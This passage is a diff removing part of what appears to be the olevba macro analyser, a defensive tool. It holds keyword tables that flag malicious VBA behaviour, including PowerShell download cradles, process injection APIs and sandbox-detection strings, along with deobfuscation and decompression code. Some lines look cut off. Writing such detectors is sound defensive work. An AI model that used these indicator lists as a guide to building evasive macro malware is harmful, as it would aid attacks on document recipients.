- ('Document_BeforeClose',),
-
- # MS Excel:
- 'Runs when the Excel Workbook is opened':
- ('Auto_Open', 'Workbook_Open', 'Workbook_Activate'),
- 'Runs when the Excel Workbook is closed':
- ('Auto_Close', 'Workbook_Close'),
-
- # any MS Office application:
- 'Runs when the file is opened (using InkPicture ActiveX object)':
- # ref:https://twitter.com/joe4security/status/770691099988025345
- (r'\w+_Painted',),
- 'Runs when the file is opened and ActiveX objects trigger events':
- (r'\w+_(?:GotFocus|LostFocus|MouseHover)',),
-}
-
-# Suspicious Keywords that may be used by malware
-# See VBA language reference: http://msdn.microsoft.com/en-us/library/office/jj692818%28v=office.15%29.aspx
-SUSPICIOUS_KEYWORDS = {
- #TODO: use regex to support variable whitespaces
- 'May read system environment variables':
- ('Environ',),
- 'May open a file':
- ('Open',),
- 'May write to a file (if combined with Open)':
- #TODO: regex to find Open+Write on same line
- ('Write', 'Put', 'Output', 'Print #'),
- 'May read or write a binary file (if combined with Open)':
- #TODO: regex to find Open+Binary on same line
- ('Binary',),
- 'May copy a file':
- ('FileCopy', 'CopyFile'),
- #FileCopy: http://msdn.microsoft.com/en-us/library/office/gg264390%28v=office.15%29.aspx
- #CopyFile: http://msdn.microsoft.com/en-us/library/office/gg264089%28v=office.15%29.aspx
- 'May delete a file':
- ('Kill',),
- 'May create a text file':
- ('CreateTextFile', 'ADODB.Stream', 'WriteText', 'SaveToFile'),
- #CreateTextFile: http://msdn.microsoft.com/en-us/library/office/gg264617%28v=office.15%29.aspx
- #ADODB.Stream sample: http://pastebin.com/Z4TMyuq6
- 'May run an executable file or a system command':
- ('Shell', 'vbNormal', 'vbNormalFocus', 'vbHide', 'vbMinimizedFocus', 'vbMaximizedFocus', 'vbNormalNoFocus',
- 'vbMinimizedNoFocus', 'WScript.Shell', 'Run', 'ShellExecute'),
- #Shell: http://msdn.microsoft.com/en-us/library/office/gg278437%28v=office.15%29.aspx
- #WScript.Shell+Run sample: http://pastebin.com/Z4TMyuq6
- 'May run PowerShell commands':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- #also: https://bitbucket.org/decalage/oletools/issues/14/olevba-library-update-ioc
- # ref: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
- # TODO: add support for keywords starting with a non-alpha character, such as "-noexit"
- # TODO: '-command', '-EncodedCommand', '-scriptblock'
- ('PowerShell', 'noexit', 'ExecutionPolicy', 'noprofile', 'command', 'EncodedCommand',
- 'invoke-command', 'scriptblock', 'Invoke-Expression', 'AuthorizationManager'),
- 'May run an executable file or a system command using PowerShell':
- ('Start-Process',),
- 'May hide the application':
- ('Application.Visible', 'ShowWindow', 'SW_HIDE'),
- 'May create a directory':
- ('MkDir',),
- 'May save the current workbook':
- ('ActiveWorkbook.SaveAs',),
- 'May change which directory contains files to open at startup':
- #TODO: confirm the actual effect
- ('Application.AltStartupPath',),
- 'May create an OLE object':
- ('CreateObject',),
- 'May create an OLE object using PowerShell':
- ('New-Object',),
- 'May run an application (if combined with CreateObject)':
- ('Shell.Application',),
- 'May enumerate application windows (if combined with Shell.Application object)':
- ('Windows', 'FindWindow'),
- 'May run code from a DLL':
- #TODO: regex to find declare+lib on same line
- ('Lib',),
- 'May inject code into another process':
- ('CreateThread', 'VirtualAlloc', # (issue #9) suggested by Davy Douhine - used by MSF payload
- 'VirtualAllocEx', 'RtlMoveMemory',
- ),
- 'May run a shellcode in memory':
- ('EnumSystemLanguageGroupsW?', # Used by Hancitor in Oct 2016
- 'EnumDateFormats(?:W|(?:Ex){1,2})?'), # see https://msdn.microsoft.com/en-us/library/windows/desktop/dd317810(v=vs.85).aspx
- 'May download files from the Internet':
- #TODO: regex to find urlmon+URLDownloadToFileA on same line
- ('URLDownloadToFileA', 'Msxml2.XMLHTTP', 'Microsoft.XMLHTTP',
- 'MSXML2.ServerXMLHTTP', # suggested in issue #13
- 'User-Agent', # sample from @ozhermit: http://pastebin.com/MPc3iV6z
- ),
- 'May download files from the Internet using PowerShell':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- ('Net.WebClient', 'DownloadFile', 'DownloadString'),
- 'May control another application by simulating user keystrokes':
- ('SendKeys', 'AppActivate'),
- #SendKeys: http://msdn.microsoft.com/en-us/library/office/gg278655%28v=office.15%29.aspx
- 'May attempt to obfuscate malicious function calls':
- ('CallByName',),
- #CallByName: http://msdn.microsoft.com/en-us/library/office/gg278760%28v=office.15%29.aspx
- 'May attempt to obfuscate specific strings (use option --deobf to deobfuscate)':
- #TODO: regex to find several Chr*, not just one
- ('Chr', 'ChrB', 'ChrW', 'StrReverse', 'Xor'),
- #Chr: http://msdn.microsoft.com/en-us/library/office/gg264465%28v=office.15%29.aspx
- 'May read or write registry keys':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- ('RegOpenKeyExA', 'RegOpenKeyEx', 'RegCloseKey'),
- 'May read registry keys':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- ('RegQueryValueExA', 'RegQueryValueEx',
- 'RegRead', #with Wscript.Shell
- ),
- 'May detect virtualization':
- # sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- (r'SYSTEM\ControlSet001\Services\Disk\Enum', 'VIRTUAL', 'VMWARE', 'VBOX'),
- 'May detect Anubis Sandbox':
- # sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- # NOTES: this sample also checks App.EXEName but that seems to be a bug, it works in VB6 but not in VBA
- # ref: http://www.syssec-project.eu/m/page-media/3/disarm-raid11.pdf
- ('GetVolumeInformationA', 'GetVolumeInformation', # with kernel32.dll
- '1824245000', r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId',
- '76487-337-8429955-22614', 'andy', 'sample', r'C:\exec\exec.exe', 'popupkiller'
- ),
- 'May detect Sandboxie':
- # sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('SbieDll.dll', 'SandboxieControlWndClass'),
- 'May detect Sunbelt Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- (r'C:\file.exe',),
- 'May detect Norman Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('currentuser',),
- 'May detect CW Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('Schmidti',),
- 'May detect WinJail Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('Afx:400000:0',),
-}
-
-# Regular Expression for a URL:
-# http://en.wikipedia.org/wiki/Uniform_resource_locator
-# http://www.w3.org/Addressing/URL/uri-spec.html
-#TODO: also support username:password@server
-#TODO: other protocols (file, gopher, wais, ...?)
-SCHEME = r'\b(?:http|ftp)s?'
-# see http://en.wikipedia.org/wiki/List_of_Internet_top-level_domains
-TLD = r'(?:xn--[a-zA-Z0-9]{4,20}|[a-zA-Z]{2,20})'
-DNS_NAME = r'(?:[a-zA-Z0-9\-\.]+\.' + TLD + ')'
-#TODO: IPv6 - see https://www.debuggex.com/
-# A literal numeric IPv6 address may be given, but must be enclosed in [ ] e.g. [db8:0cec::99:123a]
-NUMBER_0_255 = r'(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9][0-9]|[0-9])'
-IPv4 = r'(?:' + NUMBER_0_255 + r'\.){3}' + NUMBER_0_255
-# IPv4 must come before the DNS name because it is more specific
-SERVER = r'(?:' + IPv4 + '|' + DNS_NAME + ')'
-PORT = r'(?:\:[0-9]{1,5})?'
-SERVER_PORT = SERVER + PORT
-URL_PATH = r'(?:/[a-zA-Z0-9\-\._\?\,\'/\\\+&%\$#\=~]*)?' # [^\.\,\)\(\s"]
-URL_RE = SCHEME + r'\://' + SERVER_PORT + URL_PATH
-re_url = re.compile(URL_RE)
-
-
-# Patterns to be extracted (IP addresses, URLs, etc)
-# From patterns.py in balbuzard
-RE_PATTERNS = (
- ('URL', re.compile(URL_RE)),
- ('IPv4 address', re.compile(IPv4)),
- # TODO: add IPv6
- ('E-mail address', re.compile(r'(?i)\b[A-Z0-9._%+-]+@' + SERVER + '\b')),
- # ('Domain name', re.compile(r'(?=^.{1,254}$)(^(?:(?!\d+\.|-)[a-zA-Z0-9_\-]{1,63}(? char
-vba_chr = Suppress(
- Combine(WordStart(vba_identifier_chars) + CaselessLiteral('Chr')
- + Optional(CaselessLiteral('B') | CaselessLiteral('W')) + Optional('$'))
- + '(') + vba_expr_int + Suppress(')')
-
-def vba_chr_tostr(t):
- try:
- i = t[0]
- # normal, non-unicode character:
- if i>=0 and i<=255:
- return VbaExpressionString(chr(i))
- else:
- return VbaExpressionString(unichr(i).encode('utf-8', 'backslashreplace'))
- except ValueError:
- log.exception('ERROR: incorrect parameter value for chr(): %r' % i)
- return VbaExpressionString('Chr(%r)' % i)
-
-vba_chr.setParseAction(vba_chr_tostr)
-
-
-# --- ASC --------------------------------------------------------------------
-
-# Asc(char) => int
-#TODO: see MS-VBAL 6.1.2.11.1.1 page 240 => AscB, AscW
-vba_asc = Suppress(CaselessKeyword('Asc') + '(') + vba_expr_str + Suppress(')')
-vba_asc.setParseAction(lambda t: ord(t[0]))
-
-
-# --- VAL --------------------------------------------------------------------
-
-# Val(string) => int
-# TODO: make sure the behavior of VBA's val is fully covered
-vba_val = Suppress(CaselessKeyword('Val') + '(') + vba_expr_str + Suppress(')')
-vba_val.setParseAction(lambda t: int(t[0].strip()))
-
-
-# --- StrReverse() --------------------------------------------------------------------
-
-# StrReverse(string) => string
-strReverse = Suppress(CaselessKeyword('StrReverse') + '(') + vba_expr_str + Suppress(')')
-strReverse.setParseAction(lambda t: VbaExpressionString(str(t[0])[::-1]))
-
-
-# --- ENVIRON() --------------------------------------------------------------------
-
-# Environ("name") => just translated to "%name%", that is enough for malware analysis
-environ = Suppress(CaselessKeyword('Environ') + '(') + vba_expr_str + Suppress(')')
-environ.setParseAction(lambda t: VbaExpressionString('%%%s%%' % t[0]))
-
-
-# --- IDENTIFIER -------------------------------------------------------------
-
-#TODO: see MS-VBAL 3.3.5 page 33
-# 3.3.5 Identifier Tokens
-# Latin-identifier = first-Latin-identifier-character *subsequent-Latin-identifier-character
-# first-Latin-identifier-character = (%x0041-005A / %x0061-007A) ; A-Z / a-z
-# subsequent-Latin-identifier-character = first-Latin-identifier-character / DIGIT / %x5F ; underscore
-latin_identifier = Word(initChars=alphas, bodyChars=alphanums + '_')
-
-# --- HEX FUNCTION -----------------------------------------------------------
-
-# match any custom function name with a hex string as argument:
-# TODO: accept vba_expr_str_item as argument, check if it is a hex or base64 string at runtime
-
-# quoted string of at least two hexadecimal numbers of two digits:
-quoted_hex_string = Suppress('"') + Combine(Word(hexnums, exact=2) * (2, None)) + Suppress('"')
-quoted_hex_string.setParseAction(lambda t: str(t[0]))
-
-hex_function_call = Suppress(latin_identifier) + Suppress('(') + \
- quoted_hex_string('hex_string') + Suppress(')')
-hex_function_call.setParseAction(lambda t: VbaExpressionString(binascii.a2b_hex(t.hex_string)))
-
-
-# --- BASE64 FUNCTION -----------------------------------------------------------
-
-# match any custom function name with a Base64 string as argument:
-# TODO: accept vba_expr_str_item as argument, check if it is a hex or base64 string at runtime
-
-# quoted string of at least two hexadecimal numbers of two digits:
-quoted_base64_string = Suppress('"') + Regex(BASE64_RE) + Suppress('"')
-quoted_base64_string.setParseAction(lambda t: str(t[0]))
-
-base64_function_call = Suppress(latin_identifier) + Suppress('(') + \
- quoted_base64_string('base64_string') + Suppress(')')
-base64_function_call.setParseAction(lambda t: VbaExpressionString(binascii.a2b_base64(t.base64_string)))
-
-
-# ---STRING EXPRESSION -------------------------------------------------------
-
-def concat_strings_list(tokens):
- """
- parse action to concatenate strings in a VBA expression with operators '+' or '&'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of strings such as [a,'&',b,'&',c,...]
- strings = tokens[0][::2]
- return VbaExpressionString(''.join(strings))
-
-
-vba_expr_str_item = (vba_chr | strReverse | environ | quoted_string | hex_function_call | base64_function_call)
-
-vba_expr_str <<= infixNotation(vba_expr_str_item,
- [
- ("+", 2, opAssoc.LEFT, concat_strings_list),
- ("&", 2, opAssoc.LEFT, concat_strings_list),
- ])
-
-
-# --- INTEGER EXPRESSION -------------------------------------------------------
-
-def sum_ints_list(tokens):
- """
- parse action to sum integers in a VBA expression with operator '+'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return sum(integers)
-
-
-def subtract_ints_list(tokens):
- """
- parse action to subtract integers in a VBA expression with operator '-'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return reduce(lambda x,y:x-y, integers)
-
-
-def multiply_ints_list(tokens):
- """
- parse action to multiply integers in a VBA expression with operator '*'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return reduce(lambda x,y:x*y, integers)
-
-
-def divide_ints_list(tokens):
- """
- parse action to divide integers in a VBA expression with operator '/'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return reduce(lambda x,y:x/y, integers)
-
-
-vba_expr_int_item = (vba_asc | vba_val | integer)
-
-# operators associativity:
-# https://en.wikipedia.org/wiki/Operator_associativity
-
-vba_expr_int <<= infixNotation(vba_expr_int_item,
- [
- ("*", 2, opAssoc.LEFT, multiply_ints_list),
- ("/", 2, opAssoc.LEFT, divide_ints_list),
- ("-", 2, opAssoc.LEFT, subtract_ints_list),
- ("+", 2, opAssoc.LEFT, sum_ints_list),
- ])
-
-
-# see detect_vba_strings for the deobfuscation code using this grammar
-
-# === MSO/ActiveMime files parsing ===========================================
-
-def is_mso_file(data):
- """
- Check if the provided data is the content of a MSO/ActiveMime file, such as
- the ones created by Outlook in some cases, or Word/Excel when saving a
- file with the MHTML format or the Word 2003 XML format.
- This function only checks the ActiveMime magic at the beginning of data.
- :param data: bytes string, MSO/ActiveMime file content
- :return: bool, True if the file is MSO, False otherwise
- """
- return data.startswith(MSO_ACTIVEMIME_HEADER)
-
-
-# regex to find zlib block headers, starting with byte 0x78 = 'x'
-re_zlib_header = re.compile(r'x')
-
-
-def mso_file_extract(data):
- """
- Extract the data stored into a MSO/ActiveMime file, such as
- the ones created by Outlook in some cases, or Word/Excel when saving a
- file with the MHTML format or the Word 2003 XML format.
-
- :param data: bytes string, MSO/ActiveMime file content
- :return: bytes string, extracted data (uncompressed)
-
- raise a MsoExtractionError if the data cannot be extracted
- """
- # check the magic:
- assert is_mso_file(data)
-
- # In all the samples seen so far, Word always uses an offset of 0x32,
- # and Excel 0x22A. But we read the offset from the header to be more
- # generic.
- offsets = [0x32, 0x22A]
-
- # First, attempt to get the compressed data offset from the header
- # According to my tests, it should be an unsigned 16 bits integer,
- # at offset 0x1E (little endian) + add 46:
- try:
- offset = struct.unpack_from('> bit_count
- offset_mask = ~length_mask
- maximum_length = (0xFFFF >> bit_count) + 3
- return length_mask, offset_mask, bit_count, maximum_length
-
-
-def decompress_stream(compressed_container):
- """
- Decompress a stream according to MS-OVBA section 2.4.1
-
- compressed_container: string compressed according to the MS-OVBA 2.4.1.3.6 Compression algorithm
- return the decompressed container as a string (bytes)
- """
- # 2.4.1.2 State Variables
-
- # The following state is maintained for the CompressedContainer (section 2.4.1.1.1):
- # CompressedRecordEnd: The location of the byte after the last byte in the CompressedContainer (section 2.4.1.1.1).
- # CompressedCurrent: The location of the next byte in the CompressedContainer (section 2.4.1.1.1) to be read by
- # decompression or to be written by compression.
-
- # The following state is maintained for the current CompressedChunk (section 2.4.1.1.4):
- # CompressedChunkStart: The location of the first byte of the CompressedChunk (section 2.4.1.1.4) within the
- # CompressedContainer (section 2.4.1.1.1).
-
- # The following state is maintained for a DecompressedBuffer (section 2.4.1.1.2):
- # DecompressedCurrent: The location of the next byte in the DecompressedBuffer (section 2.4.1.1.2) to be written by
- # decompression or to be read by compression.
- # DecompressedBufferEnd: The location of the byte after the last byte in the DecompressedBuffer (section 2.4.1.1.2).
-
- # The following state is maintained for the current DecompressedChunk (section 2.4.1.1.3):
- # DecompressedChunkStart: The location of the first byte of the DecompressedChunk (section 2.4.1.1.3) within the
- # DecompressedBuffer (section 2.4.1.1.2).
-
- decompressed_container = b'' # result
- compressed_current = 0
-
- sig_byte = compressed_container[compressed_current]
- if sig_byte != 0x01:
- raise ValueError('invalid signature byte {0:02X}'.format(sig_byte))
-
- compressed_current += 1
-
- #NOTE: the definition of CompressedRecordEnd is ambiguous. Here we assume that
- # CompressedRecordEnd = len(compressed_container)
- while compressed_current < len(compressed_container):
- # 2.4.1.1.5
- compressed_chunk_start = compressed_current
- # chunk header = first 16 bits
- compressed_chunk_header = \
- struct.unpack("> 12) & 0x07
- if chunk_signature != 0b011:
- raise ValueError('Invalid CompressedChunkSignature in VBA compressed stream')
- # chunk flag = next bit - 1 == compressed, 0 == uncompressed
- chunk_flag = (compressed_chunk_header >> 15) & 0x01
- log.debug("chunk size = {0}, compressed flag = {1}".format(chunk_size, chunk_flag))
-
- #MS-OVBA 2.4.1.3.12: the maximum size of a chunk including its header is 4098 bytes (header 2 + data 4096)
- # The minimum size is 3 bytes
- # NOTE: there seems to be a typo in MS-OVBA, the check should be with 4098, not 4095 (which is the max value
- # in chunk header before adding 3.
- # Also the first test is not useful since a 12 bits value cannot be larger than 4095.
- if chunk_flag == 1 and chunk_size > 4098:
- raise ValueError('CompressedChunkSize > 4098 but CompressedChunkFlag == 1')
- if chunk_flag == 0 and chunk_size != 4098:
- raise ValueError('CompressedChunkSize != 4098 but CompressedChunkFlag == 0')
-
- # check if chunk_size goes beyond the compressed data, instead of silently cutting it:
- #TODO: raise an exception?
- if compressed_chunk_start + chunk_size > len(compressed_container):
- log.warning('Chunk size is larger than remaining compressed data')
- compressed_end = min([len(compressed_container), compressed_chunk_start + chunk_size])
- # read after chunk header:
- compressed_current = compressed_chunk_start + 2
-
- if chunk_flag == 0:
- # MS-OVBA 2.4.1.3.3 Decompressing a RawChunk
- # uncompressed chunk: read the next 4096 bytes as-is
- #TODO: check if there are at least 4096 bytes left
- decompressed_container += bytes([compressed_container[compressed_current:compressed_current + 4096]])
- compressed_current += 4096
- else:
- # MS-OVBA 2.4.1.3.2 Decompressing a CompressedChunk
- # compressed chunk
- decompressed_chunk_start = len(decompressed_container)
- while compressed_current < compressed_end:
- # MS-OVBA 2.4.1.3.4 Decompressing a TokenSequence
- # log.debug('compressed_current = %d / compressed_end = %d' % (compressed_current, compressed_end))
- # FlagByte: 8 bits indicating if the following 8 tokens are either literal (1 byte of plain text) or
- # copy tokens (reference to a previous literal token)
- flag_byte = compressed_container[compressed_current]
- compressed_current += 1
- for bit_index in range(0, 8):
- # log.debug('bit_index=%d / compressed_current=%d / compressed_end=%d' % (bit_index, compressed_current, compressed_end))
- if compressed_current >= compressed_end:
- break
- # MS-OVBA 2.4.1.3.5 Decompressing a Token
- # MS-OVBA 2.4.1.3.17 Extract FlagBit
- flag_bit = (flag_byte >> bit_index) & 1
- #log.debug('bit_index=%d: flag_bit=%d' % (bit_index, flag_bit))
- if flag_bit == 0: # LiteralToken
- # copy one byte directly to output
- decompressed_container += bytes([compressed_container[compressed_current]])
- compressed_current += 1
- else: # CopyToken
- # MS-OVBA 2.4.1.3.19.2 Unpack CopyToken
- copy_token = \
- struct.unpack("> temp2) + 1
- #log.debug('offset=%d length=%d' % (offset, length))
- copy_source = len(decompressed_container) - offset
- for index in range(copy_source, copy_source + length):
- decompressed_container += bytes([decompressed_container[index]])
- compressed_current += 2
- return decompressed_container
-
-
-def _extract_vba(ole, vba_root, project_path, dir_path, relaxed=False):
- """
- Extract VBA macros from an OleFileIO object.
- Internal function, do not call directly.
-
- vba_root: path to the VBA root storage, containing the VBA storage and the PROJECT stream
- vba_project: path to the PROJECT stream
- :param relaxed: If True, only create info/debug log entry if data is not as expected
- (e.g. opening substream fails); if False, raise an error in this case
- This is a generator, yielding (stream path, VBA filename, VBA source code) for each VBA code stream
- """
- # Open the PROJECT stream:
- project = ole.openstream(project_path)
- log.debug('relaxed is %s' % relaxed)
-
- # sample content of the PROJECT stream:
-
- ## ID="{5312AC8A-349D-4950-BDD0-49BE3C4DD0F0}"
- ## Document=ThisDocument/&H00000000
- ## Module=NewMacros
- ## Name="Project"
- ## HelpContextID="0"
- ## VersionCompatible32="393222000"
- ## CMG="F1F301E705E705E705E705"
- ## DPB="8F8D7FE3831F2020202020"
- ## GC="2D2FDD81E51EE61EE6E1"
- ##
- ## [Host Extender Info]
- ## &H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
- ## &H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000
- ##
- ## [Workspace]
- ## ThisDocument=22, 29, 339, 477, Z
- ## NewMacros=-4, 42, 832, 510, C
-
- code_modules = {}
-
- for line in project:
- line = line.strip().decode('utf-8','ignore')
- if '=' in line:
- # split line at the 1st equal sign:
- name, value = line.split('=', 1)
- # looking for code modules
- # add the code module as a key in the dictionary
- # the value will be the extension needed later
- # The value is converted to lowercase, to allow case-insensitive matching (issue #3)
- value = value.lower()
- if name == 'Document':
- # split value at the 1st slash, keep 1st part:
- value = value.split('/', 1)[0]
- code_modules[value] = CLASS_EXTENSION
- elif name == 'Module':
- code_modules[value] = MODULE_EXTENSION
- elif name == 'Class':
- code_modules[value] = CLASS_EXTENSION
- elif name == 'BaseClass':
- code_modules[value] = FORM_EXTENSION
-
- # read data from dir stream (compressed)
- dir_compressed = ole.openstream(dir_path).read()
-
- def check_value(name, expected, value):
- if expected != value:
- if relaxed:
- log.error("invalid value for {0} expected {1:04X} got {2:04X}"
- .format(name, expected, value))
- else:
- raise UnexpectedDataError(dir_path, name, expected, value)
-
- dir_stream = BytesIO(decompress_stream(dir_compressed))
-
- # PROJECTSYSKIND Record
- projectsyskind_id = struct.unpack(" 128:
- log.error("PROJECTNAME_SizeOfProjectName value not in range: {0}".format(projectname_sizeof_projectname))
- projectname_projectname = dir_stream.read(projectname_sizeof_projectname)
- unused = projectname_projectname
-
- # PROJECTDOCSTRING Record
- projectdocstring_id = struct.unpack(" 2000:
- log.error(
- "PROJECTDOCSTRING_SizeOfDocString value not in range: {0}".format(projectdocstring_sizeof_docstring))
- projectdocstring_docstring = dir_stream.read(projectdocstring_sizeof_docstring)
- projectdocstring_reserved = struct.unpack(" 260:
- log.error(
- "PROJECTHELPFILEPATH_SizeOfHelpFile1 value not in range: {0}".format(projecthelpfilepath_sizeof_helpfile1))
- projecthelpfilepath_helpfile1 = dir_stream.read(projecthelpfilepath_sizeof_helpfile1)
- projecthelpfilepath_reserved = struct.unpack(" 1015:
- log.error(
- "PROJECTCONSTANTS_SizeOfConstants value not in range: {0}".format(projectconstants_sizeof_constants))
- projectconstants_constants = dir_stream.read(projectconstants_sizeof_constants)
- projectconstants_reserved = struct.unpack(" 0:
- code_data = decompress_stream(code_data)
- # case-insensitive search in the code_modules dict to find the file extension:
- filext = code_modules.get(modulename_modulename.lower(), 'bin')
- filename = '{0}.{1}'.format(modulename_modulename, filext)
- #TODO: also yield the codepage so that callers can decode it properly
- yield (code_path, filename, code_data)
- # print '-'*79
- # print filename
- # print ''
- # print code_data
- # print ''
- log.debug('extracted file {0}'.format(filename))
- else:
- log.warning("module stream {0} has code data length 0".format(modulestreamname_streamname))
- except (UnexpectedDataError, SubstreamOpenError):
- raise
- except Exception as exc:
- log.info('Error parsing module {0} of {1} in _extract_vba:'
- .format(projectmodule_index, projectmodules_count),
- exc_info=True)
- if not relaxed:
- raise
- _ = unused # make pylint happy: now variable "unused" is being used ;-)
- return
-
-
-def vba_collapse_long_lines(vba_code):
- """
- Parse a VBA module code to detect continuation line characters (underscore) and
- collapse split lines. Continuation line characters are replaced by spaces.
-
- :param vba_code: str, VBA module code
- :return: str, VBA module code with long lines collapsed
- """
- # TODO: use a regex instead, to allow whitespaces after the underscore?
- vba_code = vba_code.replace(' _\r\n', ' ')
- vba_code = vba_code.replace(' _\r', ' ')
- vba_code = vba_code.replace(' _\n', ' ')
- return vba_code
-
-
-def filter_vba(vba_code):
- """
- Filter VBA source code to remove the first lines starting with "Attribute VB_",
- which are automatically added by MS Office and not displayed in the VBA Editor.
- This should only be used when displaying source code for human analysis.
-
- Note: lines are not filtered if they contain a colon, because it could be
- used to hide malicious instructions.
-
- :param vba_code: str, VBA source code
- :return: str, filtered VBA source code
- """
- vba_lines = vba_code.splitlines()
- start = 0
- for line in vba_lines:
- if line.startswith("Attribute VB_") and not ':' in line:
- start += 1
- else:
- break
- #TODO: also remove empty lines?
- vba = '\n'.join(vba_lines[start:])
- return vba
-
-
-def detect_autoexec(vba_code, obfuscation=None):
- """
- Detect if the VBA code contains keywords corresponding to macros running
- automatically when triggered by specific actions (e.g. when a document is
- opened or closed).
-
- :param vba_code: str, VBA source code
- :param obfuscation: None or str, name of obfuscation to be added to description
- :return: list of str tuples (keyword, description)
- """
- #TODO: merge code with detect_suspicious
- # case-insensitive search
- #vba_code = vba_code.lower()
- results = []
- obf_text = ''
- if obfuscation:
- obf_text = ' (obfuscation: %s)' % obfuscation
- for description, keywords in AUTOEXEC_KEYWORDS.items():
- for keyword in keywords:
- #TODO: if keyword is already a compiled regex, use it as-is
- # search using regex to detect word boundaries:
- match = re.search(r'(?i)\b' + keyword + r'\b', vba_code)
- if match:
- #if keyword.lower() in vba_code:
- found_keyword = match.group()
- results.append((found_keyword, description + obf_text))
- return results
-
-
-def detect_suspicious(vba_code, obfuscation=None):
- """
- Detect if the VBA code contains suspicious keywords corresponding to
- potential malware behaviour.
-
- :param vba_code: str, VBA source code
- :param obfuscation: None or str, name of obfuscation to be added to description
- :return: list of str tuples (keyword, description)
- """
- # case-insensitive search
- #vba_code = vba_code.lower()
- results = []
- obf_text = ''
- if obfuscation:
- obf_text = ' (obfuscation: %s)' % obfuscation
- for description, keywords in SUSPICIOUS_KEYWORDS.items():
- for keyword in keywords:
- # search using regex to detect word boundaries:
- match = re.search(r'(?i)\b' + re.escape(keyword) + r'\b', vba_code)
- if match:
- #if keyword.lower() in vba_code:
- found_keyword = match.group()
- results.append((found_keyword, description + obf_text))
- return results
-
-
-def detect_patterns(vba_code, obfuscation=None):
- """
- Detect if the VBA code contains specific patterns such as IP addresses,
- URLs, e-mail addresses, executable file names, etc.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (pattern type, value)
- """
- results = []
- found = set()
- obf_text = ''
- if obfuscation:
- obf_text = ' (obfuscation: %s)' % obfuscation
- for pattern_type, pattern_re in RE_PATTERNS:
- for match in pattern_re.finditer(vba_code):
- value = match.group()
- if value not in found:
- results.append((pattern_type + obf_text, value))
- found.add(value)
- return results
-
-
-def detect_hex_strings(vba_code):
- """
- Detect if the VBA code contains strings encoded in hexadecimal.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- results = []
- found = set()
- for match in re_hex_string.finditer(vba_code):
- value = match.group()
- if value not in found:
- decoded = binascii.unhexlify(value)
- results.append((value, decoded.decode('utf-8', 'backslashreplace')))
- found.add(value)
- return results
-
-
-def detect_base64_strings(vba_code):
- """
- Detect if the VBA code contains strings encoded in base64.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- #TODO: avoid matching simple hex strings as base64?
- results = []
- found = set()
- for match in re_base64_string.finditer(vba_code):
- # extract the base64 string without quotes:
- value = match.group().strip('"')
- # check it is not just a hex string:
- if not re_nothex_check.search(value):
- continue
- # only keep new values and not in the whitelist:
- if value not in found and value.lower() not in BASE64_WHITELIST:
- try:
- decoded = base64.b64decode(value)
- results.append((value, decoded.decode('utf-8','replace')))
- found.add(value)
- except (TypeError, ValueError) as exc:
- log.debug('Failed to base64-decode (%s)' % exc)
- # if an exception occurs, it is likely not a base64-encoded string
- return results
-
-
-def detect_dridex_strings(vba_code):
- """
- Detect if the VBA code contains strings obfuscated with a specific algorithm found in Dridex samples.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- from oletools.thirdparty.DridexUrlDecoder.DridexUrlDecoder import DridexUrlDecode
-
- results = []
- found = set()
- for match in re_dridex_string.finditer(vba_code):
- value = match.group()[1:-1]
- # check it is not just a hex string:
- if not re_nothex_check.search(value):
- continue
- if value not in found:
- try:
- decoded = DridexUrlDecode(value)
- results.append((value, decoded))
- found.add(value)
- except Exception as exc:
- log.debug('Failed to Dridex-decode (%s)' % exc)
- # if an exception occurs, it is likely not a dridex-encoded string
- return results
-
-
-def detect_vba_strings(vba_code):
- """
- Detect if the VBA code contains strings obfuscated with VBA expressions
- using keywords such as Chr, Asc, Val, StrReverse, etc.
-
- :param vba_code: str, VBA source code
- :return: list of str tuples (encoded string, decoded string)
- """
- # TODO: handle exceptions
- results = []
- found = set()
- # IMPORTANT: to extract the actual VBA expressions found in the code,
- # we must expand tabs to have the same string as pyparsing.
- # Otherwise, start and end offsets are incorrect.
- vba_code = vba_code.expandtabs()
- for tokens, start, end in vba_expr_str.scanString(vba_code):
- encoded = vba_code[start:end]
- decoded = tokens[0]
- if isinstance(decoded, VbaExpressionString):
- # This is a VBA expression, not a simple string
